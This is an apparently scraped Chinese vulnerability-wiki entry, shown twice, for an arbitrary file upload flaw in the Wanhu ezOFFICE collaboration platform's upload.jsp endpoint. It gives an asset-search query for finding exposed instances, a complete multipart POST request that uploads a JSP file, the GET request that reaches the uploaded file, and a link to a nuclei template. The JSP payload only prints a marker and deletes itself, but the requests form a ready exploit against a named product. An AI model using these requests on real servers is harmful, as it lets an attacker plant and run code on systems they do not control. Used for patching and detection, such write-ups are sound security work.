fofamini-wiki

登录白背景

源码

万户协同办公平台portletSettingId存在任意文件上传漏洞

一、漏洞简介

万户ezOFFICE协同管理平台是一个综合信息基础应用平台。万户协同办公平台portletSettingId存在任意文件上传漏洞

二、影响版本

万户ezoffice

三、资产测绘

hunterapp.name="万户 Ezoffice OA"
登录页面

四、漏洞复现

POST /defaultroot/platform/portal/layout/common/upload.jsp?portletSettingId=123&path=dir HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 286
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----othotlvgwwannsrjurc6
Cookie: OASESSIONID=416B4CE965CD27DEED8197A8528A33E6

------othotlvgwwannsrjurc6
Content-Disposition: form-data; name="file"; filename="hc0qc.jsp"
Content-Type: application/octet-stream

<%out.println("m7kmpz4ucpdtkbld4sxy");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------othotlvgwwannsrjurc6--

上传文件位置

GET /defaultroot/upload/dir/202312/2023121622252900709344996.jsp HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OASESSIONID=416B4CE965CD27DEED8197A8528A33E6; OASESSIONID=D4E78F785F0A319A594DC801BBB486AD

nuclei脚本
wanhu-fileupload-common-upload.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/tbg4qstwv0hmd8b8

# 万户协同办公平台portletSettingId存在任意文件上传漏洞

# 一、漏洞简介
万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户协同办公平台portletSettingId存在任意文件上传漏洞

# 二、影响版本

- 万户ezoffice

# 三、资产测绘

- hunter`app.name="万户 Ezoffice OA"`
- 登录页面

![image.png](./img/IMPAkh1M5fQ3KhYb/1694241158110-8d4eef16-79f1-46eb-899b-344bd2a7a19f-261247.png)

# 四、漏洞复现
```
POST /defaultroot/platform/portal/layout/common/upload.jsp?portletSettingId=123&path=dir HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 286
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----othotlvgwwannsrjurc6
Cookie: OASESSIONID=416B4CE965CD27DEED8197A8528A33E6

------othotlvgwwannsrjurc6
Content-Disposition: form-data; name="file"; filename="hc0qc.jsp"
Content-Type: application/octet-stream

<%out.println("m7kmpz4ucpdtkbld4sxy");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------othotlvgwwannsrjurc6--
```
![image.png](./img/IMPAkh1M5fQ3KhYb/1702736836876-f75a3cc6-21e0-4cb6-8e84-8539740a4d76-355462.png)
上传文件位置
```
GET /defaultroot/upload/dir/202312/2023121622252900709344996.jsp HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OASESSIONID=416B4CE965CD27DEED8197A8528A33E6; OASESSIONID=D4E78F785F0A319A594DC801BBB486AD
```
![image.png](./img/IMPAkh1M5fQ3KhYb/1702736943281-654f92f5-dc7c-4b86-a619-d2a4ab4d0e63-158598.png)
nuclei脚本
[wanhu-fileupload-common-upload.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709219604294-ace23deb-95f7-469a-9fa4-de16ca23561b.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F1622799%2F1709219604294-ace23deb-95f7-469a-9fa4-de16ca23561b.yaml%22%2C%22name%22%3A%22wanhu-fileupload-common-upload.yaml%22%2C%22size%22%3A1904%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22ufcf13f3c-e5d3-4bba-b6f5-53a037b690d%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22id%22%3A%22ub946d1bd%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tbg4qstwv0hmd8b8>